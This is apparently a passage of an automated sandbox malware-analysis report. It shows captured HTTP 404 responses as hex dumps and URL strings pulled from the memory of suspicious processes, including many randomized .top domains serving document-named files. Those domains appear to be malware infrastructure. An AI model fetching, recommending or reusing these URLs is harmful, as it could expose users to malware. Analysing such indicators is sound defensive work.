e8 92 83 f7 b7 9f f9 70 70 b5 db bc 3d 8e 71 ea d7 0e 63 f8 4e fc ce Data Ascii: 1faar-l
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:48:42 GMTServer: nginx/1.23.4Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingX-Endurance-Cache-Level: 2X-nginx-cache: WordPressTransfer-Encoding: chunkedData Raw: 33 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 56 49 4d 49 45 4e 54 4f 20 4a 55 56 45 4e 54 55 44 20 43 4f 4d 55 4e 49 54 41 52 49 41 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 73 5f 45 53 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 56 49 4d 49 45 4e 54 4f 20 4a 55 56 45 4e 54 55 44 20 43 4f 4d 55 4e 49 54 41 52 49 41 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 4f 56 49 4d 49 45 4e 54 4f 20 4a 55 56 45 4e 54 55 44 20 43 4f 4d 55 4e 49 54 41 52 49 41 22 20 2f 3e 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 68 7a 77 2e 61 76 74 2e 74 65 6d 70 6f 72 61 72 79 2e 73 69 74 65 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 68 7a 77 2e 61 76 74 2e 74 65 6d 70 6f 72 61 72 79 2e 73 69 74 65 2f 22 2c 22 6e 61 6d 65 22 3a 22 4d 4f 56 49 4d 49 45 4e 54 4f 20 4a 55 56 45 4e 54 55 44 20 43 4f 4d 55 4e 49 54 41 52 49 41 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 73
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:49:01 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:49:03 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:49:06 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 13:49:09 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://1mt8.ss1yp.top/g9sb/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://3djf.a1gao.top/3xe/xc9.xls
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://83zj4.d2um5.top/x88q/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://8jyhnm7.6cnd2.top/47n0u/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://bgj.sf3l2.top/1j7rknm/
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cjmb1.9vjyq.top/6vs38u/9x6vjf.xls
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://dnp53gn.ss1yp.top/f9qm/5bqu.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://dof.nqku1.top/7f7/67mxw.xls
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://dz30.d5s8h.top/zlf64/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ebwdm.3p20h.top/2czgqf4/0jap.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://f00v4l.tz8jk.top/5g5f8nq/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://f1qwfbw.2g6pk.top/c18/w9i.xls
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://f8subyg.x37kb.top/0nln/o72.doc
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://g77.8v089.top/damu1/pl7.xlsx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://h1s.qrqyd.top/krw96/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_279a41fe094a1c0ff59f6d
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_29ed0396622780590223cd
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_3fd2afa98866679439097f
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_7397d1bd83edde12ad6703
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_ac80d98b52b56292f7ce2d
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/cache/autoptimize/autoptimize_single_b9fc5b4f72501ef8bbdeb4
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/fonts/cantata-one/font)
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/custom-facebook-feed/assets/css/cff-style.min.css?v
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/custom-twitter-feeds/css/ctf-styles.min.css?ver=2.2
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?v
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.j
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/frontend/woocomme
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hzw.avt.temporary.site/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI
